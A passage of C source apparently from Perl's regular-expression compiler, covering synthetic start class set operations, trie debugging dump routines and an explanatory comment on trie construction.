* Since there are circumstances under which they could match, they are
* included in the SSC. But if the ANYOF node is to be inverted, we have
* to exclude them here, so that when we invert below, the end result
* actually does include them. (Think about "\xe0" =~ /[^\xc0]/di;). We
* have to do this here before we add the unconditionally matched code
* points */
if (flags & ANYOF_INVERT) {
_invlist_intersection_complement_2nd(invlist,
PL_UpperLatin1,
&invlist);
}
/* Add in the points from the bit map */
if (OP(node) != ANYOFH) {
for (i = 0; i < NUM_ANYOF_CODE_POINTS; i++) {
if (ANYOF_BITMAP_TEST(node, i)) {
unsigned int start = i++;
for (; i < NUM_ANYOF_CODE_POINTS
&& ANYOF_BITMAP_TEST(node, i); ++i)
{
/* empty */
}
invlist = _add_range_to_invlist(invlist, start, i-1);
new_node_has_latin1 = TRUE;
}
}
}
/* If this can match all upper Latin1 code points, we have to add them
* as well. But don't add them if inverting, as when that gets done below,
* it would exclude all of these characters, including the ones added just
* above that shouldn't be excluded */
if (! (flags & ANYOF_INVERT) && OP(node) == ANYOFD
&& (flags & ANYOF_SHARED_d_MATCHES_ALL_NON_UTF8_NON_ASCII_non_d_WARN_SUPER))
{
_invlist_union(invlist, PL_UpperLatin1, &invlist);
}
/* Similarly for these */
if (flags & ANYOF_MATCHES_ALL_ABOVE_BITMAP) {
_invlist_union_complement_2nd(invlist, PL_InBitmap, &invlist);
}
if (flags & ANYOF_INVERT) {
_invlist_invert(invlist);
}
else if (flags & ANYOFL_FOLD) {
if (new_node_has_latin1) {
/* Under /li, any 0-255 could fold to any other 0-255, depending on
* the locale. We can skip this if there are no 0-255 at all. */
_invlist_union(invlist, PL_Latin1, &invlist);
invlist = add_cp_to_invlist(invlist, LATIN_SMALL_LETTER_DOTLESS_I);
invlist = add_cp_to_invlist(invlist, LATIN_CAPITAL_LETTER_I_WITH_DOT_ABOVE);
}
else {
if (_invlist_contains_cp(invlist, LATIN_SMALL_LETTER_DOTLESS_I)) {
invlist = add_cp_to_invlist(invlist, 'I');
}
if (_invlist_contains_cp(invlist,
LATIN_CAPITAL_LETTER_I_WITH_DOT_ABOVE))
{
invlist = add_cp_to_invlist(invlist, 'i');
}
}
}
/* Similarly add the UTF-8 locale possible matches. These have to be
* deferred until after the non-UTF-8 locale ones are taken care of just
* above, or it leads to wrong results under ANYOF_INVERT */
if (only_utf8_locale_invlist) {
_invlist_union_maybe_complement_2nd(invlist,
only_utf8_locale_invlist,
flags & ANYOF_INVERT,
&invlist);
}
return invlist;
}
/* These two functions currently do the exact same thing */
#define ssc_init_zero ssc_init
#define ssc_add_cp(ssc, cp) ssc_add_range((ssc), (cp), (cp))
#define ssc_match_all_cp(ssc) ssc_add_range(ssc, 0, UV_MAX)
/* 'AND' a given class with another one. Can create false positives. 'ssc'
* should not be inverted. 'and_with->flags & ANYOF_MATCHES_POSIXL' should be
* 0 if 'and_with' is a regnode_charclass instead of a regnode_ssc. */
STATIC void
S_ssc_and(pTHX_ const RExC_state_t *pRExC_state, regnode_ssc *ssc,
const regnode_charclass *and_with)
{
/* Accumulate into SSC 'ssc' its 'AND' with 'and_with', which is either
* another SSC or a regular ANYOF class. Can create false positives. */
SV* anded_cp_list;
U8 and_with_flags = (OP(and_with) == ANYOFH) ? 0 : ANYOF_FLAGS(and_with);
U8 anded_flags;
PERL_ARGS_ASSERT_SSC_AND;
assert(is_ANYOF_SYNTHETIC(ssc));
/* 'and_with' is used as-is if it too is an SSC; otherwise have to extract
* the code point inversion list and just the relevant flags */
if (is_ANYOF_SYNTHETIC(and_with)) {
anded_cp_list = ((regnode_ssc *)and_with)->invlist;
anded_flags = and_with_flags;
/* XXX This is a kludge around what appears to be deficiencies in the
* optimizer. If we make S_ssc_anything() add in the WARN_SUPER flag,
* there are paths through the optimizer where it doesn't get weeded
* out when it should. And if we don't make some extra provision for
* it like the code just below, it doesn't get added when it should.
* This solution is to add it only when AND'ing, which is here, and
* only when what is being AND'ed is the pristine, original node
* matching anything. Thus it is like adding it to ssc_anything() but
* only when the result is to be AND'ed. Probably the same solution
* could be adopted for the same problem we have with /l matching,
* which is solved differently in S_ssc_init(), and that would lead to
* fewer false positives than that solution has. But if this solution
* creates bugs, the consequences are only that a warning isn't raised
* that should be; while the consequences of having /l bugs are
* incorrect matches */
if (ssc_is_anything((regnode_ssc *)and_with)) {
anded_flags |= ANYOF_SHARED_d_MATCHES_ALL_NON_UTF8_NON_ASCII_non_d_WARN_SUPER;
}
}
else {
anded_cp_list = get_ANYOF_cp_list_for_ssc(pRExC_state, and_with);
if (OP(and_with) == ANYOFD) {
anded_flags = and_with_flags & ANYOF_COMMON_FLAGS;
}
else {
anded_flags = and_with_flags
&( ANYOF_COMMON_FLAGS
|ANYOF_SHARED_d_MATCHES_ALL_NON_UTF8_NON_ASCII_non_d_WARN_SUPER
|ANYOF_SHARED_d_UPPER_LATIN1_UTF8_STRING_MATCHES_non_d_RUNTIME_USER_PROP);
if (ANYOFL_UTF8_LOCALE_REQD(and_with_flags)) {
anded_flags &=
ANYOFL_SHARED_UTF8_LOCALE_fold_HAS_MATCHES_nonfold_REQD;
}
}
}
ANYOF_FLAGS(ssc) &= anded_flags;
/* Below, C1 is the list of code points in 'ssc'; P1, its posix classes.
* C2 is the list of code points in 'and-with'; P2, its posix classes.
* 'and_with' may be inverted. When not inverted, we have the situation of
* computing:
* (C1 | P1) & (C2 | P2)
* = (C1 & (C2 | P2)) | (P1 & (C2 | P2))
* = ((C1 & C2) | (C1 & P2)) | ((P1 & C2) | (P1 & P2))
* <= ((C1 & C2) | P2) | ( P1 | (P1 & P2))
* <= ((C1 & C2) | P1 | P2)
* Alternatively, the last few steps could be:
* = ((C1 & C2) | (C1 & P2)) | ((P1 & C2) | (P1 & P2))
* <= ((C1 & C2) | C1 ) | ( C2 | (P1 & P2))
* <= (C1 | C2 | (P1 & P2))
* We favor the second approach if either P1 or P2 is non-empty. This is
* because these components are a barrier to doing optimizations, as what
* they match cannot be known until the moment of matching, since they are
* dependent on the current locale; 'AND'ing them is likely to reduce or
* eliminate them.
* But we can do better if we know that C1,P1 are in their initial state (a
* frequent occurrence), each matching everything:
* (<everything>) & (C2 | P2) = C2 | P2
* Similarly, if C2,P2 are in their initial state (again a frequent
* occurrence), the result is a no-op
* (C1 | P1) & (<everything>) = C1 | P1
*
* Inverted, we have
* (C1 | P1) & ~(C2 | P2) = (C1 | P1) & (~C2 & ~P2)
* = (C1 & (~C2 & ~P2)) | (P1 & (~C2 & ~P2))
* <= (C1 & ~C2) | (P1 & ~P2)
* */
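/* A concrete instance of the simple (non-inverted) case below (editorial
 * example): if 'ssc' is still in its pristine state (matches everything, no
 * posix classes) and 'and_with' is a plain [a-z]-style ANYOF node with no
 * posix classes, the result is just the [a-z] list: the code copies
 * 'anded_cp_list' over ssc->invlist and zeroes the posix-class bits. */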
if ((and_with_flags & ANYOF_INVERT)
&& ! is_ANYOF_SYNTHETIC(and_with))
{
unsigned int i;
ssc_intersection(ssc,
anded_cp_list,
FALSE /* Has already been inverted */
);
/* If either P1 or P2 is empty, the intersection will be also; can skip
* the loop */
if (! (and_with_flags & ANYOF_MATCHES_POSIXL)) {
ANYOF_POSIXL_ZERO(ssc);
}
else if (ANYOF_POSIXL_SSC_TEST_ANY_SET(ssc)) {
/* Note that the Posix class component P from 'and_with' actually
* looks like:
* P = Pa | Pb | ... | Pn
* where each component is one posix class, such as in [\w\s].
* Thus
* ~P = ~(Pa | Pb | ... | Pn)
* = ~Pa & ~Pb & ... & ~Pn
* <= ~Pa | ~Pb | ... | ~Pn
* The last is something we can easily calculate, but unfortunately
* is likely to have many false positives. We could do better
* in some (but certainly not all) instances if two classes in
* P have known relationships. For example
* :lower: <= :alpha: <= :alnum: <= \w <= :graph: <= :print:
* So
* :lower: & :print: = :lower:
* And similarly for classes that must be disjoint. For example,
* since \s and \w can have no elements in common based on rules in
* the POSIX standard,
* \w & ^\S = nothing
* Unfortunately, some vendor locales do not meet the Posix
* standard, in particular almost everything by Microsoft.
* The loop below just changes e.g., \w into \W and vice versa */
regnode_charclass_posixl temp;
int add = 1; /* To calculate the index of the complement */
Zero(&temp, 1, regnode_charclass_posixl);
ANYOF_POSIXL_ZERO(&temp);
for (i = 0; i < ANYOF_MAX; i++) {
assert(i % 2 != 0
|| ! ANYOF_POSIXL_TEST((regnode_charclass_posixl*) and_with, i)
|| ! ANYOF_POSIXL_TEST((regnode_charclass_posixl*) and_with, i + 1));
if (ANYOF_POSIXL_TEST((regnode_charclass_posixl*) and_with, i)) {
ANYOF_POSIXL_SET(&temp, i + add);
}
add = 0 - add; /* 1 goes to -1; -1 goes to 1 */
}
ANYOF_POSIXL_AND(&temp, ssc);
} /* else ssc already has no posixes */
} /* else: Not inverted. This routine is a no-op if 'and_with' is an SSC
in its initial state */
else if (! is_ANYOF_SYNTHETIC(and_with)
|| ! ssc_is_cp_posixl_init(pRExC_state, (regnode_ssc *)and_with))
{
/* But if 'ssc' is in its initial state, the result is just 'and_with';
* copy it over 'ssc' */
if (ssc_is_cp_posixl_init(pRExC_state, ssc)) {
if (is_ANYOF_SYNTHETIC(and_with)) {
StructCopy(and_with, ssc, regnode_ssc);
}
else {
ssc->invlist = anded_cp_list;
ANYOF_POSIXL_ZERO(ssc);
if (and_with_flags & ANYOF_MATCHES_POSIXL) {
ANYOF_POSIXL_OR((regnode_charclass_posixl*) and_with, ssc);
}
}
}
else if (ANYOF_POSIXL_SSC_TEST_ANY_SET(ssc)
|| (and_with_flags & ANYOF_MATCHES_POSIXL))
{
/* One or the other of P1, P2 is non-empty. */
if (and_with_flags & ANYOF_MATCHES_POSIXL) {
ANYOF_POSIXL_AND((regnode_charclass_posixl*) and_with, ssc);
}
ssc_union(ssc, anded_cp_list, FALSE);
}
else { /* P1 = P2 = empty */
ssc_intersection(ssc, anded_cp_list, FALSE);
}
}
}
STATIC void
S_ssc_or(pTHX_ const RExC_state_t *pRExC_state, regnode_ssc *ssc,
const regnode_charclass *or_with)
{
/* Accumulate into SSC 'ssc' its 'OR' with 'or_with', which is either
* another SSC or a regular ANYOF class. Can create false positives if
* 'or_with' is to be inverted. */
SV* ored_cp_list;
U8 ored_flags;
U8 or_with_flags = (OP(or_with) == ANYOFH) ? 0 : ANYOF_FLAGS(or_with);
PERL_ARGS_ASSERT_SSC_OR;
assert(is_ANYOF_SYNTHETIC(ssc));
/* 'or_with' is used as-is if it too is an SSC; otherwise have to extract
* the code point inversion list and just the relevant flags */
if (is_ANYOF_SYNTHETIC(or_with)) {
ored_cp_list = ((regnode_ssc*) or_with)->invlist;
ored_flags = or_with_flags;
}
else {
ored_cp_list = get_ANYOF_cp_list_for_ssc(pRExC_state, or_with);
ored_flags = or_with_flags & ANYOF_COMMON_FLAGS;
if (OP(or_with) != ANYOFD) {
ored_flags
|= or_with_flags
& ( ANYOF_SHARED_d_MATCHES_ALL_NON_UTF8_NON_ASCII_non_d_WARN_SUPER
|ANYOF_SHARED_d_UPPER_LATIN1_UTF8_STRING_MATCHES_non_d_RUNTIME_USER_PROP);
if (ANYOFL_UTF8_LOCALE_REQD(or_with_flags)) {
ored_flags |=
ANYOFL_SHARED_UTF8_LOCALE_fold_HAS_MATCHES_nonfold_REQD;
}
}
}
ANYOF_FLAGS(ssc) |= ored_flags;
/* Below, C1 is the list of code points in 'ssc'; P1, its posix classes.
* C2 is the list of code points in 'or-with'; P2, its posix classes.
* 'or_with' may be inverted. When not inverted, we have the simple
* situation of computing:
* (C1 | P1) | (C2 | P2) = (C1 | C2) | (P1 | P2)
* If P1|P2 yields a situation where both a class and its complement are
* set, like having both \w and \W, this matches all code points, and we
* can delete these from the P component of the ssc going forward. XXX We
* might be able to delete all the P components, but I (khw) am not certain
* about this, and it is better to be safe.
*
* Inverted, we have
* (C1 | P1) | ~(C2 | P2) = (C1 | P1) | (~C2 & ~P2)
* <= (C1 | P1) | ~C2
* <= (C1 | ~C2) | P1
* (which results in actually simpler code than the non-inverted case)
* */
if ((or_with_flags & ANYOF_INVERT)
&& ! is_ANYOF_SYNTHETIC(or_with))
{
/* We ignore P2, leaving P1 going forward */
} /* else Not inverted */
else if (or_with_flags & ANYOF_MATCHES_POSIXL) {
ANYOF_POSIXL_OR((regnode_charclass_posixl*)or_with, ssc);
if (ANYOF_POSIXL_SSC_TEST_ANY_SET(ssc)) {
unsigned int i;
for (i = 0; i < ANYOF_MAX; i += 2) {
if (ANYOF_POSIXL_TEST(ssc, i) && ANYOF_POSIXL_TEST(ssc, i + 1))
{
ssc_match_all_cp(ssc);
ANYOF_POSIXL_CLEAR(ssc, i);
ANYOF_POSIXL_CLEAR(ssc, i+1);
}
}
}
}
ssc_union(ssc,
ored_cp_list,
FALSE /* Already has been inverted */
);
}
PERL_STATIC_INLINE void
S_ssc_union(pTHX_ regnode_ssc *ssc, SV* const invlist, const bool invert2nd)
{
PERL_ARGS_ASSERT_SSC_UNION;
assert(is_ANYOF_SYNTHETIC(ssc));
_invlist_union_maybe_complement_2nd(ssc->invlist,
invlist,
invert2nd,
&ssc->invlist);
}
PERL_STATIC_INLINE void
S_ssc_intersection(pTHX_ regnode_ssc *ssc,
SV* const invlist,
const bool invert2nd)
{
PERL_ARGS_ASSERT_SSC_INTERSECTION;
assert(is_ANYOF_SYNTHETIC(ssc));
_invlist_intersection_maybe_complement_2nd(ssc->invlist,
invlist,
invert2nd,
&ssc->invlist);
}
PERL_STATIC_INLINE void
S_ssc_add_range(pTHX_ regnode_ssc *ssc, const UV start, const UV end)
{
PERL_ARGS_ASSERT_SSC_ADD_RANGE;
assert(is_ANYOF_SYNTHETIC(ssc));
ssc->invlist = _add_range_to_invlist(ssc->invlist, start, end);
}
PERL_STATIC_INLINE void
S_ssc_cp_and(pTHX_ regnode_ssc *ssc, const UV cp)
{
/* AND just the single code point 'cp' into the SSC 'ssc' */
SV* cp_list = _new_invlist(2);
PERL_ARGS_ASSERT_SSC_CP_AND;
assert(is_ANYOF_SYNTHETIC(ssc));
cp_list = add_cp_to_invlist(cp_list, cp);
ssc_intersection(ssc, cp_list,
FALSE /* Not inverted */
);
SvREFCNT_dec_NN(cp_list);
}
PERL_STATIC_INLINE void
S_ssc_clear_locale(regnode_ssc *ssc)
{
/* Set the SSC 'ssc' to not match any locale things */
PERL_ARGS_ASSERT_SSC_CLEAR_LOCALE;
assert(is_ANYOF_SYNTHETIC(ssc));
ANYOF_POSIXL_ZERO(ssc);
ANYOF_FLAGS(ssc) &= ~ANYOF_LOCALE_FLAGS;
}
#define NON_OTHER_COUNT NON_OTHER_COUNT_FOR_USE_ONLY_BY_REGCOMP_DOT_C
STATIC bool
S_is_ssc_worth_it(const RExC_state_t * pRExC_state, const regnode_ssc * ssc)
{
/* The synthetic start class is used to hopefully quickly winnow down
* places where a pattern could start a match in the target string. If it
* doesn't really narrow things down that much, there isn't much point to
* having the overhead of using it. This function uses some very crude
* heuristics to decide whether to use the ssc or not.
*
* It returns TRUE if 'ssc' rules out more than half of what it considers to
* be the "likely" possible matches; of course it doesn't know what the
* actual things being matched are going to be, so these are only guesses.
*
* For /l matches, it assumes that the only likely matches are going to be
* in the 0-255 range, uniformly distributed, so half of that is 127
* For /a and /d matches, it assumes that the likely matches will be just
* the ASCII range, so half of that is 63
* For /u, when there isn't anything matching above the Latin1 range, it
* assumes that that is the only range likely to be matched, and uses
* half that as the cut-off: 127. If anything matches above Latin1,
* it assumes that all of Unicode could match (uniformly), except for
* non-Unicode code points and things in the General Category "Other"
* (unassigned, private use, surrogates, controls and formats). This
* is a much larger number. */
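/* Editorial example of the arithmetic below: under /a or /d semantics
 * max_code_points is 128, so max_match is 64. An SSC that has been narrowed
 * to, say, [0-9] covers only 10 of those code points and passes the test,
 * while one that still matches most of ASCII reaches the 64 cut-off and
 * fails it. */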
U32 count = 0; /* Running total of number of code points matched by
'ssc' */
UV start, end; /* Start and end points of current range in inversion
list */
/* XXX outdated. UTF-8 locales are common, what about invert? */
const U32 max_code_points = (LOC)
? 256
: (( ! UNI_SEMANTICS
|| invlist_highest(ssc->invlist) < 256)
? 128
: NON_OTHER_COUNT);
const U32 max_match = max_code_points / 2;
PERL_ARGS_ASSERT_IS_SSC_WORTH_IT;
invlist_iterinit(ssc->invlist);
while (invlist_iternext(ssc->invlist, &start, &end)) {
if (start >= max_code_points) {
break;
}
end = MIN(end, max_code_points - 1);
count += end - start + 1;
if (count >= max_match) {
invlist_iterfinish(ssc->invlist);
return FALSE;
}
}
return TRUE;
}
STATIC void
S_ssc_finalize(pTHX_ RExC_state_t *pRExC_state, regnode_ssc *ssc)
{
/* The inversion list in the SSC is marked mortal; now we need a more
* permanent copy, which is stored the same way that is done in a regular
* ANYOF node, with the first NUM_ANYOF_CODE_POINTS code points in a bit
* map */
SV* invlist = invlist_clone(ssc->invlist, NULL);
PERL_ARGS_ASSERT_SSC_FINALIZE;
assert(is_ANYOF_SYNTHETIC(ssc));
/* The code in this file assumes that all but these flags aren't relevant
* to the SSC, except SSC_MATCHES_EMPTY_STRING, which should be cleared
* by the time we reach here */
assert(! (ANYOF_FLAGS(ssc)
& ~( ANYOF_COMMON_FLAGS
|ANYOF_SHARED_d_MATCHES_ALL_NON_UTF8_NON_ASCII_non_d_WARN_SUPER
|ANYOF_SHARED_d_UPPER_LATIN1_UTF8_STRING_MATCHES_non_d_RUNTIME_USER_PROP)));
populate_ANYOF_from_invlist( (regnode *) ssc, &invlist);
set_ANYOF_arg(pRExC_state, (regnode *) ssc, invlist, NULL, NULL);
/* Make sure is clone-safe */
ssc->invlist = NULL;
if (ANYOF_POSIXL_SSC_TEST_ANY_SET(ssc)) {
ANYOF_FLAGS(ssc) |= ANYOF_MATCHES_POSIXL;
OP(ssc) = ANYOFPOSIXL;
}
else if (RExC_contains_locale) {
OP(ssc) = ANYOFL;
}
assert(! (ANYOF_FLAGS(ssc) & ANYOF_LOCALE_FLAGS) || RExC_contains_locale);
}
#define TRIE_LIST_ITEM(state,idx) (trie->states[state].trans.list)[ idx ]
#define TRIE_LIST_CUR(state) ( TRIE_LIST_ITEM( state, 0 ).forid )
#define TRIE_LIST_LEN(state) ( TRIE_LIST_ITEM( state, 0 ).newstate )
#define TRIE_LIST_USED(idx) ( trie->states[state].trans.list \
? (TRIE_LIST_CUR( idx ) - 1) \
: 0 )
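/* Editorial note on the macros above: element 0 of each state's transition
 * list is not a real transition; its .forid field is reused as the cursor
 * (index of the next free slot) and its .newstate field as the allocated
 * length, which is why TRIE_LIST_USED() is the cursor minus one. See
 * TRIE_LIST_NEW()/TRIE_LIST_PUSH() further down for where these are set. */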
#ifdef DEBUGGING
/*
dump_trie(trie,widecharmap,revcharmap)
dump_trie_interim_list(trie,widecharmap,revcharmap,next_alloc)
dump_trie_interim_table(trie,widecharmap,revcharmap,next_alloc)
These routines dump out a trie in a somewhat readable format.
The _interim_ variants are used for debugging the interim
tables that are used to generate the final compressed
representation which is what dump_trie expects.
Part of the reason for their existence is to provide a form
of documentation as to how the different representations function.
*/
/*
Dumps the final compressed table form of the trie to Perl_debug_log.
Used for debugging make_trie().
*/
STATIC void
S_dump_trie(pTHX_ const struct _reg_trie_data *trie, HV *widecharmap,
AV *revcharmap, U32 depth)
{
U32 state;
SV *sv=sv_newmortal();
int colwidth= widecharmap ? 6 : 4;
U16 word;
GET_RE_DEBUG_FLAGS_DECL;
PERL_ARGS_ASSERT_DUMP_TRIE;
Perl_re_indentf( aTHX_ "Char : %-6s%-6s%-4s ",
depth+1, "Match","Base","Ofs" );
for( state = 0 ; state < trie->uniquecharcount ; state++ ) {
SV ** const tmp = av_fetch( revcharmap, state, 0);
if ( tmp ) {
Perl_re_printf( aTHX_ "%*s",
colwidth,
pv_pretty(sv, SvPV_nolen_const(*tmp), SvCUR(*tmp), colwidth,
PL_colors[0], PL_colors[1],
(SvUTF8(*tmp) ? PERL_PV_ESCAPE_UNI : 0) |
PERL_PV_ESCAPE_FIRSTCHAR
)
);
}
}
Perl_re_printf( aTHX_ "\n");
Perl_re_indentf( aTHX_ "State|-----------------------", depth+1);
for( state = 0 ; state < trie->uniquecharcount ; state++ )
Perl_re_printf( aTHX_ "%.*s", colwidth, "--------");
Perl_re_printf( aTHX_ "\n");
for( state = 1 ; state < trie->statecount ; state++ ) {
const U32 base = trie->states[ state ].trans.base;
Perl_re_indentf( aTHX_ "#%4" UVXf "|", depth+1, (UV)state);
if ( trie->states[ state ].wordnum ) {
Perl_re_printf( aTHX_ " W%4X", trie->states[ state ].wordnum );
} else {
Perl_re_printf( aTHX_ "%6s", "" );
}
Perl_re_printf( aTHX_ " @%4" UVXf " ", (UV)base );
if ( base ) {
U32 ofs = 0;
while( ( base + ofs < trie->uniquecharcount ) ||
( base + ofs - trie->uniquecharcount < trie->lasttrans
&& trie->trans[ base + ofs - trie->uniquecharcount ].check
!= state))
ofs++;
Perl_re_printf( aTHX_ "+%2" UVXf "[ ", (UV)ofs);
for ( ofs = 0 ; ofs < trie->uniquecharcount ; ofs++ ) {
if ( ( base + ofs >= trie->uniquecharcount )
&& ( base + ofs - trie->uniquecharcount
< trie->lasttrans )
&& trie->trans[ base + ofs
- trie->uniquecharcount ].check == state )
{
Perl_re_printf( aTHX_ "%*" UVXf, colwidth,
(UV)trie->trans[ base + ofs - trie->uniquecharcount ].next
);
} else {
Perl_re_printf( aTHX_ "%*s", colwidth," ." );
}
}
Perl_re_printf( aTHX_ "]");
}
Perl_re_printf( aTHX_ "\n" );
}
Perl_re_indentf( aTHX_ "word_info N:(prev,len)=",
depth);
for (word=1; word <= trie->wordcount; word++) {
Perl_re_printf( aTHX_ " %d:(%d,%d)",
(int)word, (int)(trie->wordinfo[word].prev),
(int)(trie->wordinfo[word].len));
}
Perl_re_printf( aTHX_ "\n" );
}
/*
Dumps a fully constructed but uncompressed trie in list form.
List tries are normally only used for construction when the number of
possible chars (trie->uniquecharcount) is very high.
Used for debugging make_trie().
*/
STATIC void
S_dump_trie_interim_list(pTHX_ const struct _reg_trie_data *trie,
HV *widecharmap, AV *revcharmap, U32 next_alloc,
U32 depth)
{
U32 state;
SV *sv=sv_newmortal();
int colwidth= widecharmap ? 6 : 4;
GET_RE_DEBUG_FLAGS_DECL;
PERL_ARGS_ASSERT_DUMP_TRIE_INTERIM_LIST;
/* print out the table precompression. */
Perl_re_indentf( aTHX_ "State :Word | Transition Data\n",
depth+1 );
Perl_re_indentf( aTHX_ "%s",
depth+1, "------:-----+-----------------\n" );
for( state=1 ; state < next_alloc ; state ++ ) {
U16 charid;
Perl_re_indentf( aTHX_ " %4" UVXf " :",
depth+1, (UV)state );
if ( ! trie->states[ state ].wordnum ) {
Perl_re_printf( aTHX_ "%5s| ","");
} else {
Perl_re_printf( aTHX_ "W%4x| ",
trie->states[ state ].wordnum
);
}
for( charid = 1 ; charid <= TRIE_LIST_USED( state ) ; charid++ ) {
SV ** const tmp = av_fetch( revcharmap,
TRIE_LIST_ITEM(state, charid).forid, 0);
if ( tmp ) {
Perl_re_printf( aTHX_ "%*s:%3X=%4" UVXf " | ",
colwidth,
pv_pretty(sv, SvPV_nolen_const(*tmp), SvCUR(*tmp),
colwidth,
PL_colors[0], PL_colors[1],
(SvUTF8(*tmp) ? PERL_PV_ESCAPE_UNI : 0)
| PERL_PV_ESCAPE_FIRSTCHAR
) ,
TRIE_LIST_ITEM(state, charid).forid,
(UV)TRIE_LIST_ITEM(state, charid).newstate
);
if (!(charid % 10))
Perl_re_printf( aTHX_ "\n%*s| ",
(int)((depth * 2) + 14), "");
}
}
Perl_re_printf( aTHX_ "\n");
}
}
/*
Dumps a fully constructed but uncompressed trie in table form.
This is the normal DFA style state transition table, with a few
twists to facilitate compression later.
Used for debugging make_trie().
*/
STATIC void
S_dump_trie_interim_table(pTHX_ const struct _reg_trie_data *trie,
HV *widecharmap, AV *revcharmap, U32 next_alloc,
U32 depth)
{
U32 state;
U16 charid;
SV *sv=sv_newmortal();
int colwidth= widecharmap ? 6 : 4;
GET_RE_DEBUG_FLAGS_DECL;
PERL_ARGS_ASSERT_DUMP_TRIE_INTERIM_TABLE;
/*
print out the table precompression so that we can do a visual check
that they are identical.
*/
Perl_re_indentf( aTHX_ "Char : ", depth+1 );
for( charid = 0 ; charid < trie->uniquecharcount ; charid++ ) {
SV ** const tmp = av_fetch( revcharmap, charid, 0);
if ( tmp ) {
Perl_re_printf( aTHX_ "%*s",
colwidth,
pv_pretty(sv, SvPV_nolen_const(*tmp), SvCUR(*tmp), colwidth,
PL_colors[0], PL_colors[1],
(SvUTF8(*tmp) ? PERL_PV_ESCAPE_UNI : 0) |
PERL_PV_ESCAPE_FIRSTCHAR
)
);
}
}
Perl_re_printf( aTHX_ "\n");
Perl_re_indentf( aTHX_ "State+-", depth+1 );
for( charid=0 ; charid < trie->uniquecharcount ; charid++ ) {
Perl_re_printf( aTHX_ "%.*s", colwidth,"--------");
}
Perl_re_printf( aTHX_ "\n" );
for( state=1 ; state < next_alloc ; state += trie->uniquecharcount ) {
Perl_re_indentf( aTHX_ "%4" UVXf " : ",
depth+1,
(UV)TRIE_NODENUM( state ) );
for( charid = 0 ; charid < trie->uniquecharcount ; charid++ ) {
UV v=(UV)SAFE_TRIE_NODENUM( trie->trans[ state + charid ].next );
if (v)
Perl_re_printf( aTHX_ "%*" UVXf, colwidth, v );
else
Perl_re_printf( aTHX_ "%*s", colwidth, "." );
}
if ( ! trie->states[ TRIE_NODENUM( state ) ].wordnum ) {
Perl_re_printf( aTHX_ " (%4" UVXf ")\n",
(UV)trie->trans[ state ].check );
} else {
Perl_re_printf( aTHX_ " (%4" UVXf ") W%4X\n",
(UV)trie->trans[ state ].check,
trie->states[ TRIE_NODENUM( state ) ].wordnum );
}
}
}
#endif
/* make_trie(startbranch,first,last,tail,word_count,flags,depth)
startbranch: the first branch in the whole branch sequence
first : start branch of sequence of branch-exact nodes.
May be the same as startbranch
last : Thing following the last branch.
May be the same as tail.
tail : item following the branch sequence
count : words in the sequence
flags : currently the OP() type we will be building, one of /EXACT(|F|FA|FU|FU_SS|L|FLU8)/
depth : indent depth
In-place optimizes a sequence of 2 or more Branch-Exact nodes into a TRIE node.
A trie is an N'ary tree where the branches are determined by digital
decomposition of the key. I.e., at the root node you look up the 1st character
and follow that branch, repeating until you find the end of the branches.
Nodes can be marked as "accepting", meaning they represent a complete word. Eg:
/he|she|his|hers/
would convert into the following structure. Numbers represent states, letters
following numbers represent valid transitions on the letter from that state; if
the number is in square brackets it represents an accepting state, otherwise it
will be in parentheses.
      +-h->+-e->[3]-+-r->(8)-+-s->[9]
      |    |
      |   (2)
      |    |
     (1)   +-i->(6)-+-s->[7]
      |
      +-s->(3)-+-h->(4)-+-e->[5]
Accept Word Mapping: 3=>1 (he), 5=>2 (she), 7=>3 (his), 9=>4 (hers)
This shows that when matching against the string 'hers' we will begin at state
1, read 'h' and move to state 2, read 'e' and move to state 3 which is
accepting, then read 'r' and go to state 8, followed by 's' which takes us to
state 9, which is also accepting. Thus we know that we can match both 'he' and
'hers' with a single traverse. We store a mapping from each accepting state to
the word that was matched, and then when we have multiple possibilities we try
to complete the rest of the regex in the order in which they occurred in the
alternation.
The only prior NFA-like behaviour that would be changed by the TRIE support is
the silent ignoring of duplicate alternations which are of the form:
/ (DUPE|DUPE) X? (?{ ... }) Y /x
Thus EVAL blocks following a trie may be called a different number of times with
and without the optimisation. With the optimisation dupes will be silently
ignored. This inconsistent behaviour of EVAL-type nodes is well established, as
the following demonstrates:
'words'=~/(word|word|word)(?{ print $1 })[xyz]/
prints out 'word' three times, but
'words'=~/(word|word|word)(?{ print $1 })S/
doesn't print it out at all. This is due to other optimisations kicking in.
Example of what happens on a structural level:
The regexp /(ac|ad|ab)+/ will produce the following debug output:
1: CURLYM[1] {1,32767}(18)
5: BRANCH(8)
6: EXACT <ac>(16)
8: BRANCH(11)
9: EXACT <ad>(16)
11: BRANCH(14)
12: EXACT <ab>(16)
16: SUCCEED(0)
17: NOTHING(18)
18: END(0)
This would be optimizable with startbranch=5, first=5, last=16, tail=16
and should turn into:
1: CURLYM[1] {1,32767}(18)
5: TRIE(16)
[Words:3 Chars Stored:6 Unique Chars:4 States:5 NCP:1]
<ac>
<ad>
<ab>
16: SUCCEED(0)
17: NOTHING(18)
18: END(0)
Cases where tail != last would be like /(?:foo|bar)baz/:
1: BRANCH(4)
2: EXACT <foo>(8)
4: BRANCH(7)
5: EXACT <bar>(8)
7: TAIL(8)
8: EXACT <baz>(10)
10: END(0)
which would be optimizable with startbranch=1, first=1, last=7, tail=8
and would end up looking like:
1: TRIE(8)
[Words:2 Chars Stored:6 Unique Chars:5 States:7 NCP:1]
<foo>
<bar>
7: TAIL(8)
8: EXACT <baz>(10)
10: END(0)
d = uvchr_to_utf8_flags(d, uv, 0);
is the recommended Unicode-aware way of saying
*(d++) = uv;
*/
#define TRIE_STORE_REVCHAR(val) \
STMT_START { \
if (UTF) { \
SV *zlopp = newSV(UTF8_MAXBYTES); \
unsigned char *flrbbbbb = (unsigned char *) SvPVX(zlopp); \
unsigned const char *const kapow = uvchr_to_utf8(flrbbbbb, val); \
SvCUR_set(zlopp, kapow - flrbbbbb); \
SvPOK_on(zlopp); \
SvUTF8_on(zlopp); \
av_push(revcharmap, zlopp); \
} else { \
char ooooff = (char)val; \
av_push(revcharmap, newSVpvn(&ooooff, 1)); \
} \
} STMT_END
/* This gets the next character from the input, folding it if not already
* folded. */
#define TRIE_READ_CHAR STMT_START { \
wordlen++; \
if ( UTF ) { \
/* if it is UTF then it is either already folded, or does not need \
* folding */ \
uvc = valid_utf8_to_uvchr( (const U8*) uc, &len); \
} \
else if (folder == PL_fold_latin1) { \
/* This folder implies Unicode rules, which in the range expressible \
* by not UTF is the lower case, with the two exceptions, one of \
* which should have been taken care of before calling this */ \
